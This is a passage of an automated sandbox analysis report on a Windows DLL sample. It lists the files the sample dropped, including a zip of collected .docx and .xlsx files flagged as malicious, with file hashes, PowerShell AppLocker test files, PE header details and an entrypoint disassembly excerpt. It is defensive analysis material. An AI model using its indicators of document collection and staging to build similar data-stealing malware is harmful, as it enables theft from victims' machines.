                              SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                              SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                              Malicious:false
                              Preview:@...e...........................................................

                              C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip

                              Download File
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                              Category:dropped
                              Size (bytes):3081
                              Entropy (8bit):7.745023518842827
                              Encrypted:false
                              SSDEEP:96:ykZSYsntzLyyyXNgAldbqJyyyXNgAld0qSa/SFxZ3lJDOf:9ZS3lidl4Jlidl8Wf
                              MD5:5EEE6058EC87911A821ACEE148388137
                              SHA1:3B36F1D3E9EC1C7B64ECF7079A9A9429327CE6C1
                              SHA-256:65596E741416EFA56DB22F1F127A3AF164703C6B95B4A8F1EFC5FE2CF5C14321
                              SHA-512:CFF6C4AC00C0C230E1206D5BA32647D3F9F1B7B47F795D8EEBE9E95C87552B2B159457860AF27EF880BA888B8B7717C43F62E2C9BFAE7FC1616F1A7D7D249371
                              Malicious:true
                              Preview:PK........T@DW/1............._Files_\LTKMYBSEYZ.docx.SI.E!..w.?.....Y...vE..M...tt.sO\...i..BI.T|..rp..d.d.i..}C.s|.@^mn..\.U..h..z....).>.q....?.= ..}E..(.Yb.s.:..c....."...~.3..y.....g....k.(..."........q9&a..>.!.S.>..a?'..b....:.....}...P+..-.........=.|...T..Z.ri..1....r.|..?w..2.e....z..a.....Rn......J*<!y.T.'m+u.....Si..?..^J.o.3.m..C.l.-.DS2.^.7>...#....>...I..S[..m...#fGw....z......g.k].......D.b..$.9j....f5..eK.k....0..._...g=..V.......bj.4.|..`..@.+.......t..,...H~..!.W.*..X...R.L.F._.B..5w.F....k....pR.^..x.}MpE.Q.oE.o;E....}XF'....,...[...;R.Zn.i..)..Ml.v...C|......W.m<*...{..........^.......-.....}.;..X....Q..T..K.o...J...J{..._;.....PK........T@DW-..............._Files_\NWTVCDUMOB.docx..G.E1...#.C9.c........!B...e.;.ji...O.@..#...7k..O..p...5z.....L.<...[1....%q."...e..<.e.n..`,.."9..4[._...1........Nq...j..T.".....T.6..z.. y...s.Z1.......q*7.A.%..]....}.o....z..7|..+....i%../..O./Y.L.sz...[.v..M.O.....W.Z>..............P

                              C:\Users\user\AppData\Local\Temp\_Files_\LTKMYBSEYZ.docx

                              Download File
                              Process:C:\Windows\SysWOW64\rundll32.exe
                              File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                              Category:dropped
                              Size (bytes):1026
                              Entropy (8bit):4.687722658485212
                              Encrypted:false
                              SSDEEP:24:gTVIxDsK0PxMQbXpEHH8+976o9VWmCUGGFT3IIU8wyG33bu3jUn:gZIxDW5lj02otC1G5IIUF/n
                              MD5:9A59DF7A478E34FB1DD60514E5C85366
                              SHA1:DE10B95426671A161E37E5CE1AD6424AB3C07D98
                              SHA-256:582393A08E0952F43A544A991772B088CC77CE584F8844DE6C5246BA36E703D5
                              SHA-512:70B4673D358E097AB2B75633A64A19C16E1422C81B6B198D81BF17B7609BFB4ACF5DE36228FF3884C5B9BA0A15E13F56C94968E5136B497C826F3D201A971B00
                              Malicious:false
                              Preview:LTKMYBSEYZYLWBDLQYQSGHCEKOMUGSMOJLJVFHAICZAEQCNCBEGUYSPUJHNJSDQTVUPUFCNWSVXGWFVWMFIWRQGVLGYUUBXDZXYJMKPAQTJLYUZTWHPYSRLPQBTKDHEWTTWLDXITQQAGNHQLMCYZCGICKEHUUXVCXHMYJQQYOQIXMRPWDNHFRXHXUHBSJQQHJNETRHWEBONEJBHTDQQNCEMAEDULTTSDIGDGEYCFSHOYFMDRTHCJKCFEFLMLVJNHUTISDTYYKQXVYELRXTCPVMTHGMXSDMUSFEPIIFBHCRRCGWXNWEXQGIUUAYBLCIBZGCXXZYYFPOIAUUAZEORINBBTOZEUXMAZYFVDWGLZZHOHNZHSEJYZULRNGAFKDQXEYHMJWAZXCTSLOIDSVWCDDAJVQOZRXWVWCMYQCKXRQMOHVCMJHXERQTMBGRETHKBIQULAPJVABDGMJDULEZZHMATXEUVKGXGGFBUQPNFRZOPVDFONCFHWZHXDJQQLBBLRNEDPABSGIFBWEQTJAGKFRSLLFIXBIADJYQFXLIYTRHHMHAEDZRJJZZSOCKJNBHWWZEZXGEEJOALVQSBDQTYEHCQVMQMBKNHLBFIRUKLCVRFKGJWGONQGFFIPLGGCUDTZOLCUDDOARJHBVHHRZEYWWKNFEXBVKDTVKTGDMSUOSIIJKKXODRUCUDQHPOJRJZICJUGIDYTFJNVOJIFAVDFPGFTUQFDWLLALACJUWFIKJDQRZQVIIULGPKDOEMRGWVXSLFQHDVZJLHRKVFDXZZCYMKQTRZIBEAHUAXZFKIOBFQACDYLWSHXGVQBAYTXLOISPDOUTEJPQXZNCWCWFKRYQGOEIQEKGUMTCROZMZMVLTCMMBZZHLSYRTDCWSSQEKPTOUQZYPJDCZQTZSHURDOLLYIYFPIECQEHEYPDXHDRIYSOEILWHEODCIXNORCUDGORDQCYVQHNTVIZVMIQLRODCUBWDVZCRJJNXNJQMHPXE

                              C:\Users\user\AppData\Local\Temp\_Files_\NWTVCDUMOB.docx

                              Download File
                              Process:C:\Windows\SysWOW64\rundll32.exe
                              File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                              Category:dropped
                              Size (bytes):1026
                              Entropy (8bit):4.696250160603532
                              Encrypted:false
                              SSDEEP:24:5Gvoddnzj/gxR0e7uyJ9MLyy07KpRnPgNcnA+2/nSgTfK0Xzy:wv4zCR0ouAMG3wPgNuAZnSQXzy
                              MD5:2B6A90B7D410E3A4E2B32C90D816B4FE
                              SHA1:B8CD90C4CDCF41CBF18D88A4C01BBA22F670AD83
                              SHA-256:D65D483904467EB7373EDA8DFAE2070C057FC93465A4AC5C9FEF8B42340D9DAB
                              SHA-512:03AFBF42E5C04E928D03C687B0F17A0AB15428C78958B206DC6C50118B961C9DDF88A6E53B3115F09FDEE44EAFA46B262933164055532D3B4B4F9265F42A6C58
                              Malicious:false
                              Preview:NWTVCDUMOBTPRQQPHXQLIMGPJXTEMPBNYLBFKQFUEVGISJSVQRMPMZSAYEYQSOTUAJFILXLTKFEVHLSAMYEEFLNJSHLTTFXRTDNUGXEFIGVCAWPMDNUICDIZGPHMESKWSMUPNOFEVXFTSHSKLCVHQTNKDHDMDRJOUTEUSCAUAVMVBMOSYKKRPPZYFUGXFXWMWRACKFCQOUHITLUCHGFZEOIPNCJFJOVBZIKDRNERXOSPKSRMHKTJUGFEOONFWLVNTJWXUFPADWYIUDKAZQXCZRFPUQQAMRTIOEHUDTLGOWYMIDOZAXTLGVEGUCQLJZGMIEQYOLWEMSGZUBWXOIBQEMQLQVGRBTUICFCEJGFTZRZCKJQEMATEONIMJKBYGQYDYXOLLROWXGYCNCVPTMRZSMMSZXKMNPSCJJJKKNRAJXGSLZNKJRJRGMCCCBCIGTLTFKNVDVIHYLGRNXDVIVWBCPNKNIFJAPQQWDQQEDDKNHVJRQJTKCUADORWREEDYTVFAOWHPNXWSNAJCVXCLLTNQPMJQHDILFNQUZJZZJJMMNDNGEBEGSTVAGZJMSMZHWJKNIAFGBUYMVADKCVLDGFQETUZXGUOUWXBBPNOWFERKMKMPOXIOTKJERPVXJGCIUKAGDGITLFYRIBAPKRESMNOMTVTZCXMODUUIGFMEMBMGAGXFZGAAZFCXDWBKKCPUKFFNMVKDFFVZYWKEKBWMADWDZXUIOOLCLIACESGRBJRSMXKUSOKXJEICCPRFWSISDTKVTDVAYSWLRHTWJGCXQMNITQJHCBMSCDRWKMGADWILLATOPVPILEQQGAIPRRUCJFTRRSSWITQKIWJOATZOBETZDBBWAIJIOXCUQSILQHQKEZXWFWWNVEWKZCGFYPBDSDBSFAZDZFRHJBZIGOZCVUGODUTNCDHKKMFHSYKUSFSXOMOUXZYOSUZNJQBXAVPOBTVBINMSIPYONLYRKIHONKWHSUAJWIALOTZAQJSNTIH

                              C:\Users\user\AppData\Local\Temp\_Files_\NWTVCDUMOB.xlsx

                              Download File
                              Process:C:\Windows\SysWOW64\rundll32.exe
                              File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                              Category:dropped
                              Size (bytes):1026
                              Entropy (8bit):4.696250160603532
                              Encrypted:false
                              SSDEEP:24:5Gvoddnzj/gxR0e7uyJ9MLyy07KpRnPgNcnA+2/nSgTfK0Xzy:wv4zCR0ouAMG3wPgNuAZnSQXzy
                              MD5:2B6A90B7D410E3A4E2B32C90D816B4FE
                              SHA1:B8CD90C4CDCF41CBF18D88A4C01BBA22F670AD83
                              SHA-256:D65D483904467EB7373EDA8DFAE2070C057FC93465A4AC5C9FEF8B42340D9DAB
                              SHA-512:03AFBF42E5C04E928D03C687B0F17A0AB15428C78958B206DC6C50118B961C9DDF88A6E53B3115F09FDEE44EAFA46B262933164055532D3B4B4F9265F42A6C58
                              Malicious:false
                              Preview:NWTVCDUMOBTPRQQPHXQLIMGPJXTEMPBNYLBFKQFUEVGISJSVQRMPMZSAYEYQSOTUAJFILXLTKFEVHLSAMYEEFLNJSHLTTFXRTDNUGXEFIGVCAWPMDNUICDIZGPHMESKWSMUPNOFEVXFTSHSKLCVHQTNKDHDMDRJOUTEUSCAUAVMVBMOSYKKRPPZYFUGXFXWMWRACKFCQOUHITLUCHGFZEOIPNCJFJOVBZIKDRNERXOSPKSRMHKTJUGFEOONFWLVNTJWXUFPADWYIUDKAZQXCZRFPUQQAMRTIOEHUDTLGOWYMIDOZAXTLGVEGUCQLJZGMIEQYOLWEMSGZUBWXOIBQEMQLQVGRBTUICFCEJGFTZRZCKJQEMATEONIMJKBYGQYDYXOLLROWXGYCNCVPTMRZSMMSZXKMNPSCJJJKKNRAJXGSLZNKJRJRGMCCCBCIGTLTFKNVDVIHYLGRNXDVIVWBCPNKNIFJAPQQWDQQEDDKNHVJRQJTKCUADORWREEDYTVFAOWHPNXWSNAJCVXCLLTNQPMJQHDILFNQUZJZZJJMMNDNGEBEGSTVAGZJMSMZHWJKNIAFGBUYMVADKCVLDGFQETUZXGUOUWXBBPNOWFERKMKMPOXIOTKJERPVXJGCIUKAGDGITLFYRIBAPKRESMNOMTVTZCXMODUUIGFMEMBMGAGXFZGAAZFCXDWBKKCPUKFFNMVKDFFVZYWKEKBWMADWDZXUIOOLCLIACESGRBJRSMXKUSOKXJEICCPRFWSISDTKVTDVAYSWLRHTWJGCXQMNITQJHCBMSCDRWKMGADWILLATOPVPILEQQGAIPRRUCJFTRRSSWITQKIWJOATZOBETZDBBWAIJIOXCUQSILQHQKEZXWFWWNVEWKZCGFYPBDSDBSFAZDZFRHJBZIGOZCVUGODUTNCDHKKMFHSYKUSFSXOMOUXZYOSUZNJQBXAVPOBTVBINMSIPYONLYRKIHONKWHSUAJWIALOTZAQJSNTIH

                              C:\Users\user\AppData\Local\Temp\_Files_\YPSIACHYXW.xlsx

                              Download File
                              Process:C:\Windows\SysWOW64\rundll32.exe
                              File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                              Category:dropped
                              Size (bytes):1026
                              Entropy (8bit):4.700014595314478
                              Encrypted:false
                              SSDEEP:24:ZUpld6DFp3zvtLC4Tmg3c0x2ngfNqdsD1OqVMyUXHt/Sv0vyjsbsV:upqDL3hO4TRc4Eq8tKvYgV
                              MD5:960373CA97DEDBA8576ECF40D0D1E39D
                              SHA1:E89C5AC4CF0B920C373CFA7D365C40C1009A14F6
                              SHA-256:501DC438F0E931ABED9FDE388BA5A8FAE8445117823118C413F54793F0E10FD7
                              SHA-512:93B34F6BC4DCEA41103E31272F2DC9CF07CC100F934CECC8F4317525DA65128DBBAD75B23CE40D46EE1DC11D10147250CAE33F01220F5624E2406B2596B726EB
                              Malicious:false
                              Preview:YPSIACHYXWDOAOALJCJYYKHKMGYIZBYLJSULATZCLAKGTHKIZZZPZMBAJFNQKRWGKHDEEYLGCRMYXVOJCXPRDOFVVXDFSZNRLGLUNBQSCSVJXKHLUFNOKRCASVQNUJDYWNWTNGJYBIKCERFIRWTZVUUNKNCMUGKTMSRIVLFQTZDVSHZTYRURNPZRSHICVPPIWUNOSYRCNVXHOFETKZDTIEIOQHCHWHDXEDXBZFSWIFFLXTXQXUBJCTQSDGVAMQKTUHJAAEDEECWFOEDCAALGNKEQRGJPVEEVJPTSROUZFPHKPUHLAYRHVULFESXXGKSAIYLAVSWMISSCMRGVQGXFGFYXBQBRZHILLZQUJRQJHUVBFDBPCNUAKOXURUUUKQNRUEAXAAXWIVATBILRXVUBDTFNWUQLPZELETXDQPCWJXRRAQILAVVZFAMGUWUYYORCQNUYLSNLTNXIAWJVDTPNCZPHSWYWWTBBJECMEGHRCATJANBKSCMLVOBOTXPKGMTOJISGOTUUOFVJPAGNMHFSAFRHQUHMYURLAJVNZPEMNMUDZAUMRZHQJBWVCUSQAENWUTRFBUFUWIPJYVLYDUIBJSTTFGSFBHTKIXJNVJUYJGSHZHMDONOHBMLQDTHGTPLYVKGUXWHEYTHTWOOMQOGUFQGRWUYBVWILTRHBAIJHZKXNAQYAIZBPYWWZSBDWNPRWGFXHNPFFMHKCCERIWCTACKIVXLZBNOTBYDOPJBYTZWNSXYXVYPHAGUHBXKPPAFNZGWEKOBPXTCLBIOEIVWLELPXJAINCDBEUOIFMNFWSRDONSGUCNGDZLIAFVNUQXZMTVJLIACGEXXESAGRKCPJNTKZHMMCTJZCLWNTNEJFUCODLVBCJHINWJYBLRXSKLVKNYGPLXGKEHMXSDKIAPHRGHBOCHQEJPMJEKRMRTLJNYNRHDPPQKJHXGYJMDUOESMBVJOBKJWUUSSZEQAGHANSYFBHIZFXSLENBLJWCHGEM

                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1m1zykgq.j1e.ps1

                              Download File
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text, with no line terminators
                              Category:dropped
                              Size (bytes):60
                              Entropy (8bit):4.038920595031593
                              Encrypted:false
                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                              Malicious:false
                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3erf2iyg.evd.ps1

                              Download File
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text, with no line terminators
                              Category:dropped
                              Size (bytes):60
                              Entropy (8bit):4.038920595031593
                              Encrypted:false
                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                              Malicious:false
                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_d0v5zafl.dbs.psm1

                              Download File
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text, with no line terminators
                              Category:dropped
                              Size (bytes):60
                              Entropy (8bit):4.038920595031593
                              Encrypted:false
                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                              Malicious:false
                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_d5zu1b4q.fn2.ps1

                              Download File
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text, with no line terminators
                              Category:dropped
                              Size (bytes):60
                              Entropy (8bit):4.038920595031593
                              Encrypted:false
                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                              Malicious:false
                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_edvqcf40.141.ps1

                              Download File
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text, with no line terminators
                              Category:dropped
                              Size (bytes):60
                              Entropy (8bit):4.038920595031593
                              Encrypted:false
                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                              Malicious:false
                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hhyhalm4.kif.psm1

                              Download File
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text, with no line terminators
                              Category:dropped
                              Size (bytes):60
                              Entropy (8bit):4.038920595031593
                              Encrypted:false
                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                              Malicious:false
                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_latjz0zt.go2.psm1

                              Download File
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text, with no line terminators
                              Category:dropped
                              Size (bytes):60
                              Entropy (8bit):4.038920595031593
                              Encrypted:false
                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                              Malicious:false
                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_m2pua0u5.xtl.ps1

                              Download File
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text, with no line terminators
                              Category:dropped
                              Size (bytes):60
                              Entropy (8bit):4.038920595031593
                              Encrypted:false
                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                              Malicious:false
                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ptim3fui.uza.ps1

                              Download File
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text, with no line terminators
                              Category:dropped
                              Size (bytes):60
                              Entropy (8bit):4.038920595031593
                              Encrypted:false
                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                              Malicious:false
                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rbpbjoys.kxe.psm1

                              Download File
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text, with no line terminators
                              Category:dropped
                              Size (bytes):60
                              Entropy (8bit):4.038920595031593
                              Encrypted:false
                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                              Malicious:false
                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vmiojeif.5wh.psm1

                              Download File
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text, with no line terminators
                              Category:dropped
                              Size (bytes):60
                              Entropy (8bit):4.038920595031593
                              Encrypted:false
                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                              Malicious:false
                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wetv5vpy.shr.psm1

                              Download File
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text, with no line terminators
                              Category:dropped
                              Size (bytes):60
                              Entropy (8bit):4.038920595031593
                              Encrypted:false
                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                              Malicious:false
                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                              Static File Info

                              General

                              File type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                              Entropy (8bit):6.688312828627548
                              TrID:
                              • Win32 Dynamic Link Library (generic) (1002004/3) 99.60%
                              • Generic Win/DOS Executable (2004/3) 0.20%
                              • DOS Executable Generic (2002/1) 0.20%
                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                              File name:0j6nSbUQQS.dll
                              File size:1'073'664 bytes
                              MD5:921b0badeaffee860310e6755769337e
                              SHA1:cfe2dfe5f457383e1723e4423e78620cc9fa8f91
                              SHA256:c9914b4ab252e782b73ab0a3efad386444ba8a8059167adcb0675968da2df36f
                              SHA512:2035442326a8e1f9733fef189cd135ce7b2dd22deda62d74e99ffd7eb83413487b91d72dba47f5512e4adcd45998ff5680a4b75342bba4c43d34186eacce1120
                              SSDEEP:24576:KNFxrUgNQWcPb72kXGWjVcwBlTd8DKT/VSMsCdTzHpgaym9:KNFxogmf2scG1Tzcm9
                              TLSH:8E358E05FA53D0B1D8D420B111B6BBF2597C6639A72445DBAB801FB69E201F33E37B29
                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......P.hv...%...%...%...$...%...$...%...$...%F..$V..%F..$...%F..$...%...$...%...%...%...$...%...$...%...%...%...$...%Rich...%.......

                              File Icon

                              Icon Hash:7ae282899bbab082

                              Static PE Info

                              General

                              Entrypoint:0x100bd96e
                              Entrypoint Section:.text
                              Digitally signed:false
                              Imagebase:0x10000000
                              Subsystem:windows gui
                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE, DLL
                              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT
                              Time Stamp:0x671CF632 [Sat Oct 26 14:01:22 2024 UTC]
                              TLS Callbacks:
                              CLR (.Net) Version:
                              OS Version Major:6
                              OS Version Minor:0
                              File Version Major:6
                              File Version Minor:0
                              Subsystem Version Major:6
                              Subsystem Version Minor:0
                              Import Hash:7e8b0331b68a47254f7000efd39b30a8

                              Entrypoint Preview

                              Instruction
                              push ebp
                              mov ebp, esp
                              cmp dword ptr [ebp+0Ch], 01h
                              jne 00007FA148B6F967h
                              call 00007FA148B6FD4Bh
                              push dword ptr [ebp+10h]
                              push dword ptr [ebp+0Ch]
                              push dword ptr [ebp+08h]
                              call 00007FA148B6F813h
                              add esp, 0Ch
                              pop ebp
                              retn 000Ch
                              and dword ptr [ecx+04h], 00000000h
                              mov eax, ecx
                              and dword ptr [ecx+08h], 00000000h
                              mov dword ptr [ecx+04h], 100E458Ch
                              mov dword ptr [ecx], 100E4584h
                              ret
                              push ebp
                              mov ebp, esp
                              sub esp, 0Ch
                              lea ecx, dword ptr [ebp-0Ch]
                              call 00007FA148B6F93Fh
                              push 100FC7CCh
                              lea eax, dword ptr [ebp-0Ch]
                              push eax
                              call 00007FA148B7177Eh
                              int3
                              push ebp
                              mov ebp, esp
                              and dword ptr [10102004h], 00000000h
                              sub esp, 24h
                              or dword ptr [100FF00Ch], 01h
                              push 0000000Ah
                              call dword ptr [100E41FCh]
                              test eax, eax
                              je 00007FA148B6FB0Fh
                              and dword ptr [ebp-10h], 00000000h
                              xor eax, eax
                              push ebx
                              push esi
                              push edi
                              xor ecx, ecx
                              lea edi, dword ptr [ebp-24h]
                              push ebx
                              cpuid
                              mov esi, ebx
                              pop ebx
                              mov dword ptr [edi], eax
                              mov dword ptr [edi+04h], esi
                              mov dword ptr [edi+08h], ecx
                              xor ecx, ecx
                              mov dword ptr [edi+0Ch], edx
                              mov eax, dword ptr [ebp-24h]
                              mov edi, dword ptr [ebp-1Ch]
                              mov dword ptr [ebp-0Ch], eax
                              xor edi, 6C65746Eh
                              mov eax, dword ptr [ebp-18h]
                              xor eax, 49656E69h
                              mov dword ptr [ebp-08h], eax
                              mov eax, dword ptr [ebp-20h]
                              xor eax, 756E6547h
                              mov dword ptr [ebp-04h], eax
                              xor eax, eax
                              inc eax
                              push ebx
                              cpuid

                              Data Directories

                              NameVirtual AddressVirtual Size Is in Section
                              IMAGE_DIRECTORY_ENTRY_EXPORT0xfd0f00x58.rdata
                              IMAGE_DIRECTORY_ENTRY_IMPORT0xfd1480x8c.rdata
                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x1080000xf8.rsrc
                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x1090000x6594.reloc
                              IMAGE_DIRECTORY_ENTRY_DEBUG0xfb0900x38.rdata
                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xfb0c80x40.rdata
                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                              IMAGE_DIRECTORY_ENTRY_IAT0xe40000x2ec.rdata
                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
